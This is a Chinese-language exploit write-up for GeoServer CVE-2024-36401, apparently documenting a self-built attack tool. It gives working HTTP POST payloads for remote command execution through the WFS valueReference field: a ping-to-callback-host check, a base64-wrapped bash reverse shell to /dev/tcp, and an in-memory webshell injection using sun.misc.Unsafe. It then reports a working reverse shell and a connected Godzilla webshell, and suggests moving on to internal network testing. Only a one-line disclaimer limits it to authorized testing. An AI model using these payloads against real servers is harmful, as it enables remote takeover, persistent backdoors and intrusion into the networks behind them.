geoserver CVE-2024-36401 环境:JDK8 声明:仅用于授权测试,用户滥用造成的一切后果和作者无关 请遵守法律法规!
1,默认payload:
POST /geoserver/wfs HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: / Connection: close Host: xxxx Accept-Language: en-US;q=0.9,en;q=0.8 Cache-Control: max-age=0 Content-Type: application/xml Content-Length: 356
<wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:topp='http://www.openplans.org/topp' xmlns:fes='http://www.opengis.net/fes/2.0' xmlns:wfs='http://www.opengis.net/wfs/2.0'> <wfs:Query typeNames='sf:archsites'/> wfs:valueReferenceexec(java.lang.Runtime.getRuntime(),'ping wsn9.callback.red')</wfs:valueReference> </wfs:GetPropertyValue>
那么注意这里: <wfs:Query typeNames='sf:archsites'/>
这个地方,如果你需要采取正则的方式去拿到,这个是sf:archsites网站的一个基本标识,你需要先拿到他的
wfs:ReturnFeatureType(.*?)</wfs:ReturnFeatureType>信息,然后你可以采取拼接的方式
判断漏洞的时候 wfs:valueReferenceexec(java.lang.Runtime.getRuntime(),'ping wsn9.callback.red')</wfs:valueReference>
这个地方,其实都不用去查找dns记录
简单的逻辑就是判断是否存在异常的类
如java.lang.ClassCastException
当然,这只是判断逻辑
这个回显本来就是400,这个地方容易踩坑,你需要判断错误页面后,进行数据查找
首先你需要请求一个 <wfs:ListStoredQueries service='WFS'\n" + " version='2.0.0'\n" + " xmlns:wfs='http://www.opengis.net/wfs/2.0'/>
这个信息代表了你可以拿到他的wfs:ReturnFeatureType(.*?)</wfs:ReturnFeatureType>
然后直接赋值给文本,然后再调一个函数方法,把文本的截取的信息,拼接到参数的<wfs:Query typeNames='sf:archsites'/>这里
这条就会对判断的逻辑相对精准,检测类就这么写就可以了
如果你只是一直使用 <wfs:Query typeNames='sf:archsites'/>,那么误判的几率很高,会提示找不到这个sf:archsites
反弹类
我们看看反弹的payload:
POST /geoserver/wfs HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: close Cookie: JSESSIONID=5D030E92A0AFCC3B5006597E6524FD8D Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Priority: u=0, i Content-Type: application/xml Content-Length: 438
<wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:topp='http://www.openplans.org/topp' xmlns:fes='http://www.opengis.net/fes/2.0' xmlns:wfs='http://www.opengis.net/wfs/2.0'> <wfs:Query typeNames='sf:archsites'/> wfs:valueReferenceexec(java.lang.Runtime.getRuntime(),'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}')</wfs:valueReference> </wfs:GetPropertyValue>
我们注意这里:
<wfs:Query typeNames='sf:archsites'/>
同样,先要正则取值然后拼接给他
然后直接请求
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OSAwPiYx这里是加密过的base64
编写的时候,就把用户输入的bash -i >& /dev/tcp/127.0.0.1/9999 0>&1,转换成base64就可以了
然后发请求,同样,去找关键的异常类,判断逻辑即可
内存马注入类 这个地方 POST /geoserver/wfs HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: / Connection: close Host: xxx Accept-Language: en-US;q=0.9,en;q=0.8 Cache-Control: max-age=0 Content-Type: application/xml Content-Length: 20383
<wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:topp='http://www.openplans.org/topp' xmlns:fes='http://www.opengis.net/fes/2.0' xmlns:wfs='http://www.opengis.net/wfs/2.0'> <wfs:Query typeNames='sf:archsites'/> wfs:valueReferenceeval(getEngineByName(javax.script.ScriptEngineManager.new(),'js'),' var str=""; var bt; try { bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str); } catch (e) { bt = java.util.Base64.getDecoder().decode(str); } var theUnsafe = java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe"); theUnsafe.setAccessible(true); unsafe = theUnsafe.get(null); unsafe.defineAnonymousClass(java.lang.Class.forName("java.lang.Class"), bt, null).newInstance(); ')</wfs:valueReference> </wfs:GetPropertyValue>
这个地方还是有 <wfs:Query typeNames='sf:archsites'/>,老规矩,先取值
在star这里,放入你生成的base64的内存马加密代码
然后判断逻辑即可
容易踩坑的点 1、 <wfs:Query typeNames='sf:archsites'/>重复利用,误判几率98%,报错如下:
https://geoserver.epic.blue/geoserver/schemas/ows/1.1.0/owsAll.xsd"> <ows:Exception exceptionCode="InvalidParameterValue" locator="typeName"> ows:ExceptionTextCould not locate {http://www.openplans.org/spearfish}archsites in catalog.<
存在漏洞的点: <ows:Exception exceptionCode="NoApplicableCode"> ows:ExceptionTextjava.lang.ClassCastException: class java.lang.ProcessImpl cannot be cast to class org.opengis.feature.type.AttributeDescriptor (java.lang.ProcessImpl is in module java.base of loader 'bootstrap'; org.opengis.feature.type.AttributeDescriptor is in unnamed module of loader org.apache.catalina.loader.ParallelWebappClassLoader @4b9df8a) class java.lang.ProcessImpl cannot be cast to class org.opengis.feature.type.AttributeDescriptor (java.lang.ProcessImpl is in module java.base of loader 'bootstrap'; org.opengis.feature.type.AttributeDescriptor is in unnamed module of loader org.apache.catalina.loader.ParallelWebappClassLoader @4b9df8a)</ows:ExceptionText> </ows:Exception>
简单来讲存在漏洞就是java.lang.ClassCastException
误判就是Could not locate {http://www.openplans.org/spearfish}archsites in catalog
2、判断方式: 抓取调用的wfs:ReturnFeatureType>,赋给文本-文本调用函数方法,请求,拼接在请求,判断回显的异常
文本调用函数这里,需要提前给值,这样防止出现空指针异常,请求前拼接,判断回显的异常,是异常内进行判断
最终我们实现了这个漏洞利用工具的编写
我们来测试一下漏洞
工具执行效果
提示:无回显和漏洞输出不存在是一样的,存在漏洞的会提示+号
发现漏洞,反弹到shell,做上线测试,如果可以上线,做一波内网测试
优化可能会加入自定义内存马,批量检测等功能
发现检测到了漏洞,拿到了端点,反弹shell也成功了
接下来我们来试试注入内存马
显示是成功注入内存马,我们来连接看看是否成功
是可以连接的
提示:测试内存马,This GeoServer instance is running version 2.15.2. For more information please contact the
该版本内存马打入成功
高版本的可能会失败
其他的自行测试
增加了自定义内存马功能
加入了ls测试,ping测试
修复内存马注入的问题
加入tomcat和jetty的识别
哥斯拉内存马默认使用jetty环境进行注入
自定义内存马可自行选择tomcat环境进行测试
批量版本暂未发布